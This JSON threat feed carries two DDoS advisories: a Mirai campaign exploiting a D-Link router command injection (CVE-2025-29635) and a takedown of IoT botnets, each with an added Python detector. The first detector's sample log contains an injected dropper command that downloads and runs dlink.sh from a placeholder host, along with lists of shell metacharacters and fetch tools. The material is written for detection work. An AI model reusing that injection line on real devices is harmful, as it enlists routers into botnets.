{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata — refreshed continuously.","feed_url":"https://feed.craftedsignal.io/tags/ddos/","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cves":[{"cvss":8.8,"id":"CVE-2025-29635"},{"cvss":8.8,"id":"CVE-2023-1389"}],"_cs_exploited":false,"_cs_products":["DIR-823X","ZXV10 H108L"],"_cs_severities":["critical"],"_cs_tags":["mirai","ddos","rce","iot"],"_cs_type":"advisory","_cs_vendors":["D-Link","TP-Link","ZTE"],"content_html":"\u003cp\u003eA new Mirai-based malware campaign has been observed exploiting CVE-2025-29635, a high-severity (CVSS 8.8) command injection vulnerability in D-Link DIR-823X routers. Akamai\u0026rsquo;s SIRT observed the campaign in March 2026: attackers send crafted POST requests to the router\u0026rsquo;s web interface to execute arbitrary commands, then use that access to download and run a shell script that installs Mirai-based malware. The DIR-823X reached end-of-life in November 2024, so a vendor patch is unlikely. 
The same actor is also exploiting CVE-2023-1389, a command injection flaw in TP-Link Archer AX21 routers, and an RCE flaw in ZTE ZXV10 H108L routers, deploying the same Mirai payload.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker sends a POST request to the \u003ccode\u003e/goform/set_prohibiting\u003c/code\u003e endpoint on the D-Link DIR-823X router.\u003c/li\u003e\n\u003cli\u003eThe POST request exploits CVE-2025-29635 to inject and execute arbitrary commands.\u003c/li\u003e\n\u003cli\u003eThe injected command string changes directory through several writable paths on the router, the usual Mirai dropper pattern for finding somewhere the payload can be written.\u003c/li\u003e\n\u003cli\u003eA shell script named \u003ccode\u003edlink.sh\u003c/code\u003e is downloaded from an attacker-controlled external IP address.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003edlink.sh\u003c/code\u003e script is executed on the compromised router.\u003c/li\u003e\n\u003cli\u003eThe script installs a Mirai-based malware variant named \u0026ldquo;tuxnokill\u0026rdquo;.\u003c/li\u003e\n\u003cli\u003e\u0026ldquo;tuxnokill\u0026rdquo; establishes persistence and begins scanning for new targets.\u003c/li\u003e\n\u003cli\u003eThe compromised device is then used to launch DDoS attacks using Mirai\u0026rsquo;s standard attack types, including TCP SYN, ACK and STOMP floods, UDP floods, and HTTP null attacks.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2025-29635 allows attackers to remotely execute arbitrary commands on vulnerable D-Link DIR-823X routers. The compromised routers are then incorporated into the Mirai botnet, increasing its size and DDoS capacity. Because the DIR-823X is end-of-life, no fix is expected, so exposed units stay vulnerable and the pool of devices that can be enlisted is large. 
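\u003c/p\u003e
\u003cp\u003eThe request-level and download-level checks that the Recommendation section of this brief asks for, as an added example that is not part of the original brief and not Akamai\u0026rsquo;s or the feed\u0026rsquo;s own detection content. It runs over a few constructed HTTP transaction records in a made-up \u003ccode\u003ets | client | method | url | body\u003c/code\u003e layout; the \u003ccode\u003e/goform/set_prohibiting\u003c/code\u003e endpoint and the \u003ccode\u003edlink.sh\u003c/code\u003e name come from the brief, while the \u003ccode\u003eflag=1\u003c/code\u003e parameter in the malicious body, the 198.51.100.9 dropper host and the rule names are placeholders, not observed indicators.\u003c/p\u003e

```python
from urllib.parse import urlparse

# Values the brief gives: the injection endpoint and the dropper file name.
ENDPOINT = '/goform/set_prohibiting'
DROPPER = 'dlink.sh'
# Shell metacharacters and fetch tools typical of an injected Mirai dropper command.
METACHARS = (';', '|', '&&', '`', '$(')
FETCHERS = ('wget', 'curl', 'tftp', 'ftpget', 'busybox', '/bin/sh')

# Constructed records in a made-up layout: ts | client | method | url | body.
# The parameter name flag=1 and the host 198.51.100.9 are placeholders, not IOCs.
SAMPLE_LOG = [
    '2026-04-23T11:58:01Z | 192.168.1.20 | GET | http://192.168.1.1/index.html | ',
    '2026-04-23T11:58:40Z | 192.168.1.20 | POST | http://192.168.1.1/goform/set_prohibiting | prohibit_enable=1',
    '2026-04-23T12:00:02Z | 203.0.113.7 | POST | http://192.168.1.1/goform/set_prohibiting | flag=1;cd /tmp;cd /var/run;cd /mnt;wget http://198.51.100.9/dlink.sh;sh dlink.sh',
    '2026-04-23T12:00:03Z | 192.168.1.1 | GET | http://198.51.100.9/dlink.sh | ',
]

def parse_record(line):
    # Split on the field separator; maxsplit keeps separators inside the body intact.
    parts = line.split(' | ', 4)
    if len(parts) != 5:
        return None
    ts, client, method, url, body = parts
    return {'ts': ts, 'client': client, 'method': method.upper(),
            'url': url, 'path': urlparse(url).path, 'body': body}

def classify(rec):
    # Returns (severity, rule) or None for records that are not of interest.
    if rec['method'] == 'POST' and rec['path'] == ENDPOINT:
        body = rec['body']
        injected = any(m in body for m in METACHARS)
        # The cd-walk through writable paths plus a fetch tool is the dropper signature.
        fetches = any(t in body for t in FETCHERS) or body.count('cd ') >= 2
        if injected and fetches:
            return ('high', 'cve-2025-29635_dropper_injection')
        if injected:
            return ('medium', 'cve-2025-29635_shell_metachar')
        # The endpoint is also used by the legitimate admin UI, so a clean body is low.
        return ('low', 'set_prohibiting_post')
    # Any fetch of the dropper by name, the intent of the Sigma rule named in the brief.
    if rec['path'].endswith('/' + DROPPER) or DROPPER in rec['body']:
        return ('high', 'mirai_dlink_sh_download')
    return None

def detect(lines):
    findings = []
    for line in lines:
        rec = parse_record(line)
        if rec is None:
            continue
        hit = classify(rec)
        if hit:
            findings.append((rec['ts'], rec['client'], hit[0], hit[1]))
    return findings

if __name__ == '__main__':
    for finding in detect(SAMPLE_LOG):
        print(finding)
```

\u003cp\u003eA clean POST to the endpoint is reported at low severity on purpose: the admin UI uses the same path, so the metacharacter and fetch-tool checks are what separate an exploit from a configuration change. The last record, the router itself fetching \u003ccode\u003edlink.sh\u003c/code\u003e from an external host, is the one worth paging on even if the exploiting request was never seen.\u003c/p\u003e
\u003cp\u003e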
This can result in network disruptions and service outages for the targets of the botnet\u0026rsquo;s floods and, because the attacker holds command execution on a network gateway, potential interception or exfiltration of traffic passing through the compromised router.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor for POST requests to the \u003ccode\u003e/goform/set_prohibiting\u003c/code\u003e endpoint on D-Link routers, as described in the Attack Chain. The endpoint is also used by the legitimate admin UI, so treat request bodies containing shell metacharacters or download commands (\u003ccode\u003ewget\u003c/code\u003e, \u003ccode\u003ecurl\u003c/code\u003e, \u003ccode\u003etftp\u003c/code\u003e) as exploitation attempts rather than alerting on every POST.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect Mirai dlink.sh Download\u003c/code\u003e to identify attempts to download the malicious shell script.\u003c/li\u003e\n\u003cli\u003eReplace end-of-life D-Link DIR-823X routers, since no patch is expected. For TP-Link devices affected by CVE-2023-1389 and ZTE ZXV10 H108L routers, apply vendor firmware where it exists and replace devices that cannot be updated. Until then, keep the web management interface unreachable from the WAN and segment these devices from the rest of the network to limit potential damage.\u003c/li\u003e\n\u003cli\u003eBlock the external IP address hosting the \u003ccode\u003edlink.sh\u003c/code\u003e script if it can be reliably determined and is observed on your network, and treat any outbound request for \u003ccode\u003edlink.sh\u003c/code\u003e from a router as evidence of compromise.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-23T12:00:00Z","date_published":"2026-04-23T12:00:00Z","id":"/briefs/2026-04-mirai-dlink-rce/","summary":"A new Mirai-based malware campaign is exploiting CVE-2025-29635, a command-injection vulnerability affecting D-Link DIR-823X routers, to enlist devices into the botnet.","title":"Mirai Campaign Exploiting CVE-2025-29635 in D-Link Routers","url":"https://feed.craftedsignal.io/briefs/2026-04-mirai-dlink-rce/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["iot","ddos","botnet","disruption"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eAuthorities have dismantled a globally distributed network of compromised Internet of Things (IoT) devices that was being used to conduct large-scale DDoS attacks, overwhelming target systems and rendering them inaccessible. 
While the specific devices, malware, and attribution remain undisclosed in the source, the takedown matters for defenders because it removes capacity that attackers had been using for record-breaking attacks.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eCompromise IoT Devices: Attackers exploit weaknesses such as default credentials and unpatched firmware on IoT devices such as routers, cameras, and DVRs.\u003c/li\u003e\n\u003cli\u003eInstall Malware: A bot binary built for the device\u0026rsquo;s CPU architecture is written to the compromised device and executed.\u003c/li\u003e\n\u003cli\u003eBotnet Formation: The malware turns the IoT devices into bots controlled remotely by a command-and-control (C2) server.\u003c/li\u003e\n\u003cli\u003eC2 Communication: The bots maintain persistent communication with the C2 server, awaiting instructions for launching attacks.\u003c/li\u003e\n\u003cli\u003eDDoS Attack Initiation: The C2 server issues commands to the bots, instructing them to flood a target system with malicious traffic.\u003c/li\u003e\n\u003cli\u003eTraffic Aggregation: Each bot\u0026rsquo;s stream is modest on its own, but thousands of bots acting in unison add up to volumes that overwhelm the target\u0026rsquo;s bandwidth or connection-handling capacity.\u003c/li\u003e\n\u003cli\u003eService Disruption: The target system becomes unavailable to legitimate users, with potential financial losses and reputational damage for the targeted organization.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe DDoS attacks launched by these IoT botnets caused significant service disruptions for targeted organizations. 
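\u003c/p\u003e
\u003cp\u003eThe outbound-flood check behind the advice below to investigate high-volume traffic originating from internal devices, as an added example that is not part of the original brief. It is a small flow aggregator over constructed NetFlow-style records; the address ranges, window, packet-rate threshold and concentration ratio are assumptions to tune per site, and the laptop, NAS and camera flows are invented to show a true positive beside a legitimate high-rate transfer.\u003c/p\u003e

```python
import ipaddress
from collections import defaultdict

# Assumption: the site uses these address ranges; adjust to your own.
INTERNAL_NETS = [ipaddress.ip_network('192.168.0.0/16'), ipaddress.ip_network('10.0.0.0/8')]

def is_internal(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)

def build_sample_flows():
    # Constructed flow records, NetFlow-style:
    # (ts, src, dst, dport, proto, tcp_flags, packets, bytes).
    flows = []
    # A laptop browsing: a few complete sessions to several hosts, modest packet rate.
    for i in range(20):
        flows.append((1000.0 + i * 0.4, '192.168.10.7', '203.0.113.%d' % (i % 5 + 1),
                      443, 'tcp', 'SPA', 40, 38000))
    # A NAS pushing a backup to one cloud peer: high packet rate, but large packets and
    # completed handshakes; this must not be flagged.
    for i in range(50):
        flows.append((1000.0 + i * 0.2, '192.168.10.9', '203.0.113.200',
                      443, 'tcp', 'SPA', 400, 560000))
    # A compromised camera sending SYN-only, single-packet flows at one victim: a SYN flood.
    for i in range(5000):
        flows.append((1000.0 + i * 0.002, '192.168.10.50', '198.51.100.20',
                      443, 'tcp', 'S', 1, 60))
    return flows

def find_outbound_floods(flows, window=10.0, pps_threshold=300, concentration=0.9):
    # Flag internal sources whose outbound traffic in a window is fast, aimed at one
    # destination, and made of SYN-only flows or tiny packets. Returns one dict per hit.
    stats = defaultdict(lambda: {'pkts': 0, 'bytes': 0, 'flows': 0, 'syn_only': 0,
                                 'per_dst': defaultdict(int)})
    for ts, src, dst, dport, proto, flags, pkts, nbytes in flows:
        if not is_internal(src) or is_internal(dst):
            continue  # only traffic leaving the site is of interest here
        s = stats[(src, int(ts // window))]
        s['pkts'] += pkts
        s['bytes'] += nbytes
        s['flows'] += 1
        s['per_dst'][dst] += pkts
        if proto == 'tcp' and flags == 'S':
            s['syn_only'] += 1
    findings = []
    for (src, bucket), s in sorted(stats.items()):
        pps = s['pkts'] / window
        if pps < pps_threshold:
            continue
        top_dst, top_pkts = max(s['per_dst'].items(), key=lambda kv: kv[1])
        share = top_pkts / s['pkts']
        syn_ratio = s['syn_only'] / s['flows']
        avg_pkt = s['bytes'] / s['pkts']
        # A backup or video upload is also fast and single-destination, but its packets
        # are large and its flows complete the handshake; a flood is SYN-only or tiny.
        if share >= concentration and (syn_ratio >= concentration or avg_pkt < 100):
            findings.append({'src': src, 'dst': top_dst, 'window_start': bucket * window,
                             'pps': pps, 'syn_ratio': round(syn_ratio, 2),
                             'avg_pkt_bytes': round(avg_pkt, 1)})
    return findings

if __name__ == '__main__':
    for hit in find_outbound_floods(build_sample_flows()):
        print(hit)
```

\u003cp\u003eThe NAS backup is the case that trips a naive packets-per-second alarm: it is fast and single-destination, but its packets are large and its flows complete the handshake, so it passes. The camera fails on both counts and is reported together with the victim address, which is the tip-off a targeted organization would want to receive.\u003c/p\u003e
\u003cp\u003e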
The attacks were described as \u0026ldquo;record-breaking\u0026rdquo;, which refers to attack volume; the source gives neither victim counts nor affected sectors, but DDoS attacks can impact any organization with an online presence. Successful attacks lead to website and application unavailability, impacting business operations and customer access.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor network traffic in both directions: inbound spikes in volume, connection rate, or packets per second against your services, and outbound floods from internal IoT segments, which indicate that your own devices have been enlisted.\u003c/li\u003e\n\u003cli\u003eImplement rate limiting and traffic filtering at the network edge, and arrange upstream mitigation in advance, since volumetric floods exceed what a single site can absorb on its own.\u003c/li\u003e\n\u003cli\u003eAlthough no specific IOCs are available, investigate any alerts related to high-volume network traffic originating from internal devices.\u003c/li\u003e\n\u003cli\u003eEnable logging (flow records, firewall logs) on network devices to capture potential indicators of compromise and attack activity.\u003c/li\u003e\n\u003cli\u003eHarden IoT devices against the initial compromise described in the Attack Chain: change default credentials, apply firmware updates, and keep management interfaces off the internet.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-20T05:50:09Z","date_published":"2026-03-20T05:50:09Z","id":"/briefs/2024-01-iot-ddos-disruption/","summary":"Law enforcement has disrupted significant IoT botnets responsible for launching record-breaking distributed denial-of-service (DDoS) attacks, impacting the availability of targeted systems.","title":"Disruption of Large IoT DDoS Botnets","url":"https://feed.craftedsignal.io/briefs/2024-01-iot-ddos-disruption/"}],"language":"en","title":"CraftedSignal Threat Feed — Ddos","version":"https://jsonfeed.org/version/1.1"}